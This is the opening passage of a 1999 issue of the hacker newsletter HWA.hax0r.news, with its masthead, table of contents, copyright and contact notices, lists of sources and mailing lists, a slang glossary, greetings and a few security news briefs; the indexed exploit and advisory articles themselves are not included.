home *** CD-ROM | disk | FTP | other *** search
Text File | 2002-05-27 | 569.4 KB | 11,787 lines |
-
- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
- ==========================================================================
- = <=-[ HWA.hax0r.news ]-=> =
- ==========================================================================
- [=HWA'99=] Number 20 Volume 1 1999 May 29th 99
- ==========================================================================
- [ 61:20:6B:69:64:20:63:6F:75: ]
- [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
- [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
- ==========================================================================
-
- "There are two major products that come out of Berkeley: LSD and UNIX.
- We don't believe this to be a coincidence."
-
- -Jeremy S. Anderson
-
-
-
- HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
- and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
- and airportman for the Cubesoft bandwidth. Also shouts out to all our
- mirror sites! tnx guys.
-
- http://www.csoft.net/~hwa
- http://www.digitalgeeks.com/hwa
-
-
-
-
-
- Synopsis
- ---------
-
- The purpose of this newsletter is to 'digest' current events of interest
- that affect the online underground and netizens in general. This includes
- coverage of general security issues, hacks, exploits, underground news
- and anything else I think is worthy of a look see. (remember i'm doing
- this for me, not you, the fact some people happen to get a kick/use
- out of it is of secondary importance).
-
- This list is NOT meant as a replacement for, nor to compete with, the
- likes of publications such as CuD or PHRACK or with news sites such as
- AntiOnline, the Hacker News Network (HNN) or mailing lists such as
- BUGTRAQ or ISN nor could any other 'digest' of this type do so.
-
- It *is* intended however, to compliment such material and provide a
- reference to those who follow the culture by keeping tabs on as many
- sources as possible and providing links to further info, its a labour
- of love and will be continued for as long as I feel like it, i'm not
- motivated by dollars or the illusion of fame, did you ever notice how
- the most famous/infamous hackers are the ones that get caught? there's
- a lot to be said for remaining just outside the circle... <g>
-
-
-
- @HWA
-
- =-----------------------------------------------------------------------=
-
- Welcome to HWA.hax0r.news ... #20
-
- =-----------------------------------------------------------------------=
-
-
- "It is possible to provide security against other ills, but as far as
- death is concerned, we men live in a city without walls."
-
- -Epicurus
-
-
-
- We could use some more people joining the channel, its usually pretty
- quiet, we don't bite (usually) so if you're hanging out on irc stop
- by and idle a while and say hi...
-
- *******************************************************************
- *** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
- *** ***
- *** please join to discuss or impart news on techno/phac scene ***
- *** stuff or just to hang out ... someone is usually around 24/7***
- *** ***
- *** Note that the channel isn't there to entertain you its for ***
- *** you to talk to us and impart news, if you're looking for fun***
- *** then do NOT join our channel try #weirdwigs or something... ***
- *** we're not #chatzone or #hack ***
- *** ***
- *******************************************************************
-
-
- =-------------------------------------------------------------------------=
-
- Issue #20
-
-
- =--------------------------------------------------------------------------=
-
- "Wars have never hurt anybody except the people who die."
-
- -Salvador Dali
-
-
- [ INDEX ]
- =--------------------------------------------------------------------------=
- Key Content
- =--------------------------------------------------------------------------=
-
- 00.0 .. COPYRIGHTS ......................................................
- 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
- 00.2 .. SOURCES .........................................................
- 00.3 .. THIS IS WHO WE ARE ..............................................
- 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
- 00.5 .. THE HWA_FAQ V1.0 ................................................
-
- 01.0 .. GREETS ..........................................................
- 01.1 .. Last minute stuff, rumours, newsbytes ...........................
- 01.2 .. Mailbag .........................................................
- 02.0 .. From the Editor..................................................
- 03.0 .. Clinton Authorizes Cyber Attack??? ..............................
- 03.1 .. More on the 'Cyberwar'...........................................
- 04.0 .. RootFest Scares Officials In Minneapolis ........................
- 05.0 .. Australia Admits to Echelon .....................................
- 06.0 .. Banks to Test Home User PC Security .............................
- 07.0 .. EMPEROR VIRUS....................................................
- 08.0 .. WINHLP32.EXE BUFFER OVERRUN......................................
- 09.0 .. NAI ON GALADRIEL VIRUS...........................................
- 10.0 .. Know your enemy parts 1,2 and 3..................................
- 11.0 .. Cox Report Blasts DOE Computer Security .........................
- 12.0 .. Black Hat Briefings Announced ...................................
- 13.0 .. eEYe Digital Security advisory: Multiple Web Interface Security Holes
- 14.0 .. Fun with ICQ.....................................................
- 15.0 .. FBI raids suspected hackers......................................
- 15.1 .. Real life hacker wargames........................................
- 16.0 .. MOD hacks Senate site............................................
- 17.0 .. Backdoor-G a new 'backorifice like' trojan and BO2K..............
- 18.0 .. [CNN] A Q&A with Emmanuel Goldstein, editor of 2600 magazine.....
- 19.0 .. [CNN] 'Hacking is a felony': Q&A with IBM's Charles Palmer.......
- 20.0 .. Five Busted in Florida ..........................................
- 21.0 .. Danes Finger Swede for Cracking 12,000 Systems ..................
- 22.0 .. EFA Plans Net Censorship Demonstrations..........................
- 23.0 .. Design Principals for Tamper-Resistant Smart Card Processors.....
- 24.0 .. Melissa finds a mate.............................................
- 25.0 .. punkz.com sets up a page for feedback on the presidential cyberwar
- 26.0 .. Its that time of month again, when the 26th rolls around, look out
- 27.0 .. Submission: "Be A Nice Hacker" by System.........................
- 28.0 .. Hacking Memes by Stephen Downes..................................
- 29.0 .. [ISN] House panel aims to bolster security law...................
- 30.0 .. [ISN] NSA Taps Universities For Info Security Studies............
- 31.0 .. [ISN] HushMail: free Web-based email with bulletproof encryption.
- 32.0 .. [ISN] E-Biz Bucks Lost Under SSL Strain..........................
- 33.0 .. [ISN] Bracing for guerrilla warfare in cyberspace................
- 34.0 .. [ISN] Prosecuting Lee Is Problematic.............................
- 35.0 .. [ISN] Slip of the Tongue Lightens up Encryption Hearing .........
- 36.0 .. [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control",
- 37.0 .. [ISN] LCI Intros SMARTpen Biometric Signature Authentication.....
- 38.0 .. [ISN] CFP: DISC 99 Computer Security 99..........................
- 39.0 .. [ISN] GAO: NASA systems full of holes............................
- 39.1 .. [ISN] Nasa vulnerabilities potentially deadly....................
- 40.0 .. Citrux Winframe client for Linux vulnerability...................
- 41.0 .. [ISN] Top 10 candidates for a "duh" list (general sec/crypto)....
- 42.0 .. Seeing invisible fields and avoiding them...the MicroAlarm.......
- 43.0 .. RelayCheck v1.0 scan for smtp servers that will relay mail.......
- 44.0 .. Admintool exploit for Solaris (Updated) by Shadow Penguin Security
- 45.0 .. AppManager 2.0 for NT from NetIQ displays passwords in cleartext
- 46.0 .. Cgichck99 ported to Rebol from Su1d Sh3ll's .c code..............
- 47.0 .. ICSA certifies weak crypto as secure.............................
- 48.0 .. RAS and RRAS vulnerability.......................................
- 49.0 .. Whitepaper:The Unforseen Consequences of Login Scripts By Dan Kaminsky
- 50.0 .. Vulnerability in pop2.imap.......................................
- 51.0 .. Infosec.19990526.compaq-im.a 'Compaq insight manager vulnerability'
- 52.0 .. Advisory: NT ODBC Remote Compromise...............................
- 53.0 .. Advisory: Buffer overflow in SmartDesk WebSuite v2.1..............
- 54.0 .. Security Leak with IBM Netfinity Remote Control Software..........
- 55.0 .. IBM eNetwork Firewall for AIX ....................................
- =--------------------------------------------------------------------------=
-
-
- AD.S .. Post your site ads or etc here, if you can offer something in return
- thats tres cool, if not we'll consider ur ad anyways so send it in.
- ads for other zines are ok too btw just mention us in yours, please
- remember to include links and an email contact. Corporate ads will
- be considered also and if your company wishes to donate to or
- participate in the upcoming Canc0n99 event send in your suggestions
- and ads now...n.b date and time may be pushed back join mailing list
- for up to date information.......................................
- Current dates: Aug19th-22nd Niagara Falls... .................
-
- HA.HA .. Humour and puzzles ............................................
-
- Hey You!........................................................
- =------=........................................................
-
- Send in humour for this section! I need a laugh and its hard to
- find good stuff... ;)...........................................
-
- SITE.1 .. Featured site, .................................................
- H.W .. Hacked Websites ...............................................
- A.0 .. APPENDICES......................................................
- A.1 .. PHACVW linx and references......................................
-
- =--------------------------------------------------------------------------=
-
- @HWA'99
-
-
- 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
- OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
- WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
- (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
- READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
-
- Important semi-legalese and license to redistribute:
-
- YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
- AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
- ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
- IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
- APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
- IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
- ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
- ME PRIVATELY current email cruciphux@dok.org
-
- THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
- WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
- THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
-
- I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
- AND REDISTRIBUTE/MIRROR. - EoD
-
-
- Although this file and all future issues are now copyright, some of
- the content holds its own copyright and these are printed and
- respected. News is news so i'll print any and all news but will quote
- sources when the source is known, if its good enough for CNN its good
- enough for me. And i'm doing it for free on my own time so pfffft. :)
-
- No monies are made or sought through the distribution of this material.
- If you have a problem or concern email me and we'll discuss it.
-
- cruciphux@dok.org
-
- Cruciphux [C*:.]
-
-
-
- 00.1 CONTACT INFORMATION AND MAIL DROP
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-
- Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
- Canada / North America (hell even if you are inside ..) and wish to
- send printed matter like newspaper clippings a subscription to your
- cool foreign hacking zine or photos, small non-explosive packages
- or sensitive information etc etc well, now you can. (w00t) please
- no more inflatable sheep or plastic dog droppings, or fake vomit
- thanks.
-
- Send all goodies to:
-
- HWA NEWS
- P.O BOX 44118
- 370 MAIN ST. NORTH
- BRAMPTON, ONTARIO
- CANADA
- L6V 4H5
-
- WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
- ~~~~~~~ reading this from some interesting places, make my day and get a
- mention in the zine, send in a postcard, I realize that some places
- it is cost prohibitive but if you have the time and money be a cool
- dude / gal and send a poor guy a postcard preferably one that has some
- scenery from your place of residence for my collection, I collect stamps
- too so you kill two birds with one stone by being cool and mailing in a
- postcard, return address not necessary, just a "hey guys being cool in
- Bahrain, take it easy" will do ... ;-) thanx.
-
-
-
- Ideas for interesting 'stuff' to send in apart from news:
-
- - Photo copies of old system manual front pages (optionally signed by you) ;-)
- - Photos of yourself, your mom, sister, dog and or cat in a NON
- compromising position plz I don't want pr0n. <g>
- - Picture postcards
- - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
- tapes with hack/security related archives, logs, irc logs etc on em.
- - audio or video cassettes of yourself/others etc of interesting phone
- fun or social engineering examples or transcripts thereof.
-
- If you still can't think of anything you're probably not that interesting
- a person after all so don't worry about it <BeG>
-
- Our current email:
-
- Submissions/zine gossip.....: hwa@press.usmc.net
- Private email to editor.....: cruciphux@dok.org
- Distribution/Website........: sas72@usa.net
-
- @HWA
-
-
-
- 00.2 Sources ***
- ~~~~~~~~~~~
-
- Sources can be some, all, or none of the following (by no means complete
- nor listed in any degree of importance) Unless otherwise noted, like msgs
- from lists or news from other sites, articles and information is compiled
- and or sourced by Cruciphux no copyright claimed.
-
- News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a>
- Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
- News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a>
- Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a>
- News,Advisories,++ ...............<a href="http://www.l0pht.com/">http://www.l0pht.com/</a>
- NewsTrolls .......................<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a>
- News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
- CuD Computer Underground Digest...<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
- News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a>
- News site+Security................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a>
- News site+Security................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a>
- News site+Security................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a>
- News site+Security related site...<a href="http://www.403-security.org/">http://www.403-security.org/</a>
- News/Humour site+ ................<a href="http://www.innerpulse.com/>http://www.innerpulse.com</a>
-
- +Various mailing lists and some newsgroups, such as ...
- +other sites available on the HNN affiliates page, please see
- http://www.hackernews.com/affiliates.html as they seem to be popping up
- rather frequently ...
-
-
- http://www.the-project.org/ .. IRC list/admin archives
- http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
-
- alt.hackers.malicious
- alt.hackers
- alt.2600
- BUGTRAQ
- ISN security mailing list
- ntbugtraq
- <+others>
-
- NEWS Agencies, News search engines etc:
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- http://www.cnn.com/SEARCH/
- <a href="http://www.cnn.com/SEARCH/">Link</a>
-
- http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
- <a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>
-
- http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
- <a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>
-
- http://www.ottawacitizen.com/business/
- <a href="http://www.ottawacitizen.com/business/">Link</a>
-
- http://search.yahoo.com.sg/search/news_sg?p=hack
- <a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>
-
- http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
- <a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>
-
- http://www.zdnet.com/zdtv/cybercrime/
- <a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a>
-
- http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
- <a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>
-
- NOTE: See appendices for details on other links.
-
-
-
- http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
- <a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>
-
- http://freespeech.org/eua/ Electronic Underground Affiliation
- <a href="http://freespeech.org/eua/">Link</a>
-
- http://ech0.cjb.net ech0 Security
- <a href="http://ech0.cjb.net">Link</a>
-
- http://axon.jccc.net/hir/ Hackers Information Report
- <a href="http://axon.jccc.net/hir/">Link</a>
-
- http://net-security.org Net Security
- <a href="http://net-security.org">Link</a>
-
- http://www.403-security.org Daily news and security related site
- <a href="http://www.403-security.org">Link</a>
-
-
- Submissions/Hints/Tips/Etc
- ~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- All submissions that are `published' are printed with the credits
- you provide, if no response is received by a week or two it is assumed
- that you don't care wether the article/email is to be used in an issue
- or not and may be used at my discretion.
-
- Looking for:
-
- Good news sites that are not already listed here OR on the HNN affiliates
- page at http://www.hackernews.com/affiliates.html
-
- Magazines (complete or just the articles) of breaking sekurity or hacker
- activity in your region, this includes telephone phraud and any other
- technological use, abuse hole or cool thingy. ;-) cut em out and send it
- to the drop box.
-
-
- - Ed
-
- Mailing List Subscription Info (Far from complete) Feb 1999
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
-
- ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
-
-
- THE MOST READ:
-
- BUGTRAQ - Subscription info
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- What is Bugtraq?
-
- Bugtraq is a full-disclosure UNIX security mailing list, (see the info
- file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
- bugtraq, send mail to listserv@netspace.org containing the message body
- subscribe bugtraq. I've been archiving this list on the web since late
- 1993. It is searchable with glimpse and archived on-the-fly with hypermail.
-
- Searchable Hypermail Index;
-
- http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
-
- <a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
-
- About the Bugtraq mailing list
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- The following comes from Bugtraq's info file:
-
- This list is for *detailed* discussion of UNIX security holes: what they are,
- how to exploit, and what to do to fix them.
-
- This list is not intended to be about cracking systems or exploiting their
- vulnerabilities. It is about defining, recognizing, and preventing use of
- security holes and risks.
-
- Please refrain from posting one-line messages or messages that do not contain
- any substance that can relate to this list`s charter.
-
- I will allow certain informational posts regarding updates to security tools,
- documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
- on this list.
-
- Please follow the below guidelines on what kind of information should be posted
- to the Bugtraq list:
-
- + Information on Unix related security holes/backdoors (past and present)
- + Exploit programs, scripts or detailed processes about the above
- + Patches, workarounds, fixes
- + Announcements, advisories or warnings
- + Ideas, future plans or current works dealing with Unix security
- + Information material regarding vendor contacts and procedures
- + Individual experiences in dealing with above vendors or security organizations
- + Incident advisories or informational reporting
-
- Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
- reflector address if the response does not meet the above criteria.
-
- Remember: YOYOW.
-
- You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
- those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
-
- For questions or comments, please mail me:
- chasin@crimelab.com (Scott Chasin)
-
-
-
- Crypto-Gram
- ~~~~~~~~~~~
-
- CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
- insights, and commentaries on cryptography and computer security.
-
- To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
- blank message to crypto-gram-subscribe@chaparraltree.com.á To unsubscribe,
- visit http://www.counterpane.com/unsubform.html.á Back issues are available
- on http://www.counterpane.com.
-
- CRYPTO-GRAM is written by Bruce Schneier.á Schneier is president of
- Counterpane Systems, the author of "Applied Cryptography," and an inventor
- of the Blowfish, Twofish, and Yarrow algorithms.á He served on the board of
- the International Association for Cryptologic Research, EPIC, and VTW.á He
- is a frequent writer and lecturer on cryptography.
-
-
- CUD Computer Underground Digest
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- This info directly from their latest ish:
-
- Computer underground Digestááá Suná 14 Feb, 1999áá Volume 11 : Issue 09
- ááááá
- ááááááááááááááááááááá ISSNá 1004-042X
-
- áááááá Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
- áááááá News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
- áááááá Archivist: Brendan Kehoe
- áááááá Poof Reader:áá Etaion Shrdlu, Jr.
- áááááá Shadow-Archivists: Dan Carosone / Paul Southworth
- ááááááááááááááááááááááááá Ralph Sims / Jyrki Kuoppala
- ááááááááááááááááááááááááá Ian Dickinson
- áááááá Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
-
-
-
- [ISN] Security list
- ~~~~~~~~~~~~~~~~~~~
- This is a low volume list with lots of informative articles, if I had my
- way i'd reproduce them ALL here, well almost all .... ;-) - Ed
-
-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
-
-
-
- @HWA
-
-
- 00.3 THIS IS WHO WE ARE
- ~~~~~~~~~~~~~~~~~~
-
- Some HWA members and Legacy staff
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- cruciphux@dok.org.........: currently active/editorial
- darkshadez@ThePentagon.com: currently active/man in black
- fprophet@dok.org..........: currently active/IRC+ man in black
- sas72@usa.net ............. currently active/IRC+ distribution
- vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
- dicentra...(email withheld): IRC+ grrl in black
-
-
- Foreign Correspondants/affiliate members
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- N0Portz ..........................: Australia
- Qubik ............................: United Kingdom
- system error .....................: Indonesia
- Wile (wile coyote) ...............: Japan/the East
- Ruffneck ........................: Netherlands/Holland
-
- And unofficially yet contributing too much to ignore ;)
-
- Spikeman .........................: World media
-
- Please send in your sites for inclusion here if you haven't already
- also if you want your emails listed send me a note ... - Ed
-
- http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
- http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
-
-
- *******************************************************************
- *** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
- *******************************************************************
-
- :-p
-
-
- 1. We do NOT work for the government in any shape or form.Unless you count paying
- taxes ... in which case we work for the gov't in a BIG WAY. :-/
-
- 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
- events its a good idea to check out issue #1 at least and possibly also the
- Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
-
-
- @HWA
-
-
-
- 00.4 Whats in a name? why HWA.hax0r.news??
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-
- Well what does HWA stand for? never mind if you ever find out I may
- have to get those hax0rs from 'Hackers' or the Pretorians after you.
-
- In case you couldn't figure it out hax0r is "new skewl" and although
- it is laughed at, shunned, or even pidgeon holed with those 'dumb
- leet (l33t?) dewds' <see article in issue #4> this is the state
- of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
- up and comers, i'd highly recommend you get that book. Its almost
- like buying a clue. Anyway..on with the show .. - Editorial staff
-
-
- @HWA
-
- 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Also released in issue #3. (revised) check that issue for the faq
- it won't be reprinted unless changed in a big way with the exception
- of the following excerpt from the FAQ, included to assist first time
- readers:
-
- Some of the stuff related to personal useage and use in this zine are
- listed below: Some are very useful, others attempt to deny the any possible
- attempts at eschewing obfuscation by obsucuring their actual definitions.
-
- @HWA - see EoA ;-)
-
- != - Mathematical notation "is not equal to" or "does not equal"
- ASC(247) "wavey equals" sign means "almost equal" to. If written
- an =/= (equals sign with a slash thru it) also means !=, =< is Equal
- to or less than and => is equal to or greater than (etc, this aint
- fucking grade school, cripes, don't believe I just typed all that..)
-
- AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
-
- AOL - A great deal of people that got ripped off for net access by a huge
- clueless isp with sekurity that you can drive buses through, we're
- not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
- least they could try leasing one??
-
- *CC - 1 - Credit Card (as in phraud)
- 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
-
- CCC - Chaos Computer Club (Germany)
-
- *CON - Conference, a place hackers crackers and hax0rs among others go to swap
- ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
- watch videos and seminars, get drunk, listen to speakers, and last but
- not least, get drunk.
- *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
- speak he's the guy that breaks into systems and is often (but by no
- means always) a "script kiddie" see pheer
- 2 . An edible biscuit usually crappy tasting without a nice dip, I like
- jalapeno pepper dip or chives sour cream and onion, yum - Ed
-
- Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
- Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
- ebonics, speaking in a dark tongue ... being ereet, see pheer
-
- EoC - End of Commentary
-
- EoA - End of Article or more commonly @HWA
-
- EoF - End of file
-
- EoD - End of diatribe (AOL'ers: look it up)
-
- FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
- usually in general media articles not high brow articles such as ours or other
- HNN affiliates ;)
-
- du0d - a small furry animal that scurries over keyboards causing people to type
- weird crap on irc, hence when someone says something stupid or off topic
- 'du0d wtf are you talkin about' may be used.
-
- *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
-
- *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
- define, I think it is best defined as pop culture's view on The Hacker ala
- movies such as well erhm "Hackers" and The Net etc... usually used by "real"
- hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
- some coffee?' or can you hax0r some bread on the way to the table please?'
-
- 2 - A tool for cutting sheet metal.
-
- HHN - Maybe a bit confusing with HNN but we did spring to life around the same
- time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
- noun means the hackernews site proper. k? k. ;&
-
- HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
-
- J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
-
- MFI/MOI- Missing on/from IRC
-
- NFC - Depends on context: No Further Comment or No Fucking Comment
-
- NFR - Network Flight Recorder (Do a websearch) see 0wn3d
-
- NFW - No fuckin'way
-
- *0WN3D - You are cracked and owned by an elite entity see pheer
- *OFCS - Oh for christ's sakes
-
- PHACV - And variations of same <coff>
- Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
-
- Alternates: H - hacking, hacktivist
- C - Cracking <software>
- C - Cracking <systems hacking>
- V - Virus
- W - Warfare <cyberwarfare usually as in Jihad>
- A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
- P - Phreaking, "telephone hacking" PHone fREAKs ...
- CT - Cyber Terrorism
-
- *PHEER - This is what you do when an ereet or elite person is in your presence
- see 0wn3d
-
- *RTFM - Read the fucking manual - not always applicable since some manuals are
- pure shit but if the answer you seek is indeed in the manual then you
- should have RTFM you dumb ass.
-
- TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
-
- TBA - To Be Arranged/To Be Announced also 2ba
-
- TFS - Tough fucking shit.
-
- *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
- from the underground masses. also "w00ten" <sic>
-
- 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
-
- *wtf - what the fuck
-
- *ZEN - The state you reach when you *think* you know everything (but really don't)
- usually shortly after reaching the ZEN like state something will break that
- you just 'fixed' or tweaked.
-
- @HWA
-
-
- -=- :. .: -=-
-
-
-
-
- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Thanks to all in the community for their support and interest but i'd
- like to see more reader input, help me out here, whats good, what sucks
- etc, not that I guarantee i'll take any notice mind you, but send in
- your thoughts anyway.
-
-
- * all the people who sent in cool emails and support
-
- FProphet Pyra TwstdPair _NeM_
- D----Y Kevin Mitnick (watch yer back) Dicentra
- vexxation sAs72 Spikeman Astral
- p0lix Vexx g0at security
-
- Shouts to tekz from HK for asking nicely in eye-are-see! ;-)
- and to t4ck for making my night albeit I couldn't stick around for
- the rest of the comedy routine. hacked star dot star with phf huh?
- .... ;-))
-
- and the #innerpulse, crew and some inhabitants of #leetchans ....
- although I use the term 'leet loosely these days, <k0ff><snicker> ;)
-
-
- kewl sites:
-
- + http://www.l0pht.com/
- + http://www.2600.com/
- + http://www.freekevin.com/
- + http://www.genocide2600.com/
- + http://www.genocide2600.com/~spikeman/
- + http://www.genocide2600.com/~tattooman/
- + http://www.hackernews.com/ (Went online same time we started issue 1!)
- + http://www.net-security.org/
- + http://www.slashdot.org/
- + http://www.freshmeat.net/
- + http://www.403-security.org/
- + http://ech0.cjb.net/
-
- @HWA
-
-
- 01.1 Last minute stuff, rumours and newsbytes
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- "What is popular isn't always right, and what is right isn't
- always popular..."
- - FProphet '99
-
-
-
- +++ When was the last time you backed up your important data?
-
- ++ THE FIRST TRUE CYPHERPUNK NOVEL (CULT. 3:00 am)
- http://www.wired.com/news/news/email/explode-infobeat/culture/story/19720.html
-
- Two generations of swashbuckling geeks tackle the forces of
- evil. Call it hip, call it funny. But you can't call it
- light summer reading. Declan McCullagh reviews Neal Stephenson's Cryptonomicon.
-
- (checkout www.cryptonomicon.com also - Ed)
-
-
- ++ STUDENTS ARRESTED
-
- From HNS http://www.net-security.org/
-
- by BHZ, Friday 28th May 1999 on 12.02 am CET
- Five Flagler Palm Coast High School students - one the son of a Bunnell city
- commissioner - are facing a litany of criminal charges after authorities said they used
- a computer trojan to hack into the school's network and commandeer teacher and
- student files. Flagler County sheriff's deputies arrested the students Monday. All five
- were taken to the Division of Youth Services in Daytona Beach before being released
- to their parents.
-
-
-
- ++ FIGHT THE CENSORSHIP
-
- From HNS http://www.net-security.org/
-
- by BHZ, Thursday 27th May 1999 on 9.53 pm CET
- Yesterday, the Australian Senate passed legislation to censor the Internet. In order to
- protest censorship people will join with like minded groups and individuals in a day of
- action against censorship. Download flyers here and sure do visit Electronic Frontiers
- Australia site.
-
- http://www.anatomy.usyd.edu.au/danny/freedom/march/
- http://www.efa.org.au
-
